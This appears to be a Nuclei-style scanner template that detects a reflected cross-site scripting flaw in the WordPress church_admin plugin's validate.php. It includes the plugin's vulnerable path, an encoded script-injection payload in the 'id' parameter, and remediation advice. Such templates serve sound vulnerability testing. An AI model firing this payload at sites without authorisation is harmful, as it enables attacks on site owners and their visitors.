id: wp-church-admin-xss
info:
  name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Church Admin Cross-Site Scripting Vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    There is a cross-site scripting vulnerability in the church_admin version of the WordPress plugin. The vulnerability stems from the plugin not sanitizing and escaping parameters on the reset password form. An attacker could exploit this vulnerability to perform cross-site scripting attacks.
  severity: medium
  remediation: |-
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    part: body
    words:
    - </script><script>alert(document.domain)</script>
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
  method: GET
